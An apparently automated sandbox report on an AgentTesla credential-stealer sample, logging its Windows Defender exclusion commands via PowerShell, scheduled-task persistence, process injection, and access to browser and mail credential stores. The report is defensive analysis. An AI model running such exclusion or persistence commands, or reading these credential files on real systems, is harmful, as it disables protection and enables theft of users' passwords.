
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory written: C:\Users\user\AppData\Roaming\lnYkIr.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Users\user\AppData\Roaming\lnYkIr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Users\user\AppData\Roaming\lnYkIr.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7708, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
